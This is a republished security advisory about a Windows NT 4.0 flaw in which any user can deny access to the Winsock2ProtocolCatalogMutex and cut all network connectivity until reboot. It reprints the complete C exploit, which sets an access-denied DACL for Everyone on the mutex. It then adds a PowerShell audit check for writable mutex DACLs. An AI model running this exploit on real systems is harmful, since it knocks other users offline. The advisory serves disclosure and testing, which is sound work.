Winsock Mutex vulnerability exploit code released

Summary

There is a mutex called Winsock2ProtocolCatalogMutex in Windows NT 4.0 to which the Everyone group has Full Control. Any user can change this to No Access, which disables all network connectivity through Winsock until the system is rebooted. This was reported in our previous article: Winsock Mutex vulnerability (Patch available).
Exploit code is now available to test for this vulnerability.

Credit:

The information has been provided by Arne Vidstrom.


Details

Exploit:

/*
 * mutation.c - (c) 2000, Arne Vidstrom, arne.vidstrom@ntsecurity.nu
 * http://ntsecurity.nu
 *
 * - Disables all network connectivity through Winsock
 * - Can be run from any account (e.g. an ordinary User account)
 */

#include <windows.h>
#include <aclapi.h>
#include <stdlib.h>   /* malloc, free */

/* Link with advapi32.lib (SetNamedSecurityInfo, AllocateAndInitializeSid) */

int main(void)
{
        PSID pEveryoneSID;
        SID_IDENTIFIER_AUTHORITY iWorld = SECURITY_WORLD_SID_AUTHORITY;
        PACL pDacl;
        DWORD sizeNeeded;

        /* Build the well-known SID for Everyone (S-1-1-0) */
        AllocateAndInitializeSid(&iWorld, 1, SECURITY_WORLD_RID,
                                 0, 0, 0, 0, 0, 0, 0, &pEveryoneSID);

        /* Size of an ACL holding one access-denied ACE for that SID;
           ACCESS_DENIED_ACE already contains the first DWORD of the SID */
        sizeNeeded = sizeof(ACL) + sizeof(ACCESS_DENIED_ACE) +
                     GetLengthSid(pEveryoneSID) - sizeof(DWORD);
        pDacl = (PACL) malloc(sizeNeeded);
        InitializeAcl(pDacl, sizeNeeded, ACL_REVISION);

        /* Deny Everyone all access ("No Access") */
        AddAccessDeniedAce(pDacl, ACL_REVISION, GENERIC_ALL, pEveryoneSID);

        /* Replace the DACL on the mutex; this works for any user because the
           existing DACL grants Everyone Full Control, which includes WRITE_DAC */
        SetNamedSecurityInfo("Winsock2ProtocolCatalogMutex", SE_KERNEL_OBJECT,
                             DACL_SECURITY_INFORMATION, NULL, NULL, pDacl, NULL);

        free(pDacl);
        FreeSid(pEveryoneSID);
        return 0;
}
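As an added audit check, not part of the advisory or of Arne Vidstrom's code, the following PowerShell reports whether a named mutex's DACL grants Everyone (S-1-1-0) the rights needed to rewrite it (change permissions or take ownership), which is the condition the summary describes. It assumes Windows PowerShell 5.1 on .NET Framework, where Mutex.OpenExisting(name, MutexRights) and MutexSecurity are available, and that a mutex with the given name exists in the caller's namespace.

```powershell
# Audit whether a named mutex lets Everyone rewrite its DACL.
# Assumes Windows PowerShell 5.1 / .NET Framework APIs.
function Test-MutexDaclWritableByEveryone {
    param(
        [Parameter(Mandatory)][string]$Name
    )
    # READ_CONTROL is enough to read the security descriptor
    $openRights = [System.Security.AccessControl.MutexRights]::ReadPermissions
    try {
        $mutex = [System.Threading.Mutex]::OpenExisting($Name, $openRights)
    } catch [System.Threading.WaitHandleCannotBeOpenedException] {
        Write-Warning "Mutex '$Name' does not exist in this namespace"
        return $null
    } catch [System.UnauthorizedAccessException] {
        Write-Warning "Not permitted to read the DACL of mutex '$Name'"
        return $null
    }
    try {
        $acl = $mutex.GetAccessControl()
    } finally {
        $mutex.Dispose()
    }

    # WRITE_DAC or WRITE_OWNER is what lets a caller replace the DACL outright
    $dangerous = [System.Security.AccessControl.MutexRights]::ChangePermissions -bor
                 [System.Security.AccessControl.MutexRights]::TakeOwnership

    $rules = $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
    $findings = foreach ($rule in $rules) {
        # Only Allow entries for the World SID matter here
        if ($rule.AccessControlType -ne 'Allow') { continue }
        if ($rule.IdentityReference.Value -ne 'S-1-1-0') { continue }
        if (($rule.MutexRights -band $dangerous) -ne 0) {
            [pscustomobject]@{
                Mutex    = $Name
                Identity = 'Everyone'
                Rights   = $rule.MutexRights
            }
        }
    }
    return $findings
}

# The NT 4.0 name from the advisory; on later Windows versions named objects
# may live under Global\ or a session namespace, so adjust for the audited host.
Test-MutexDaclWritableByEveryone -Name 'Winsock2ProtocolCatalogMutex'
```

An empty result means no Allow entry for Everyone carries ChangePermissions or TakeOwnership; any object returned is a DACL that an unprivileged user could replace, as the advisory describes for NT 4.0.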
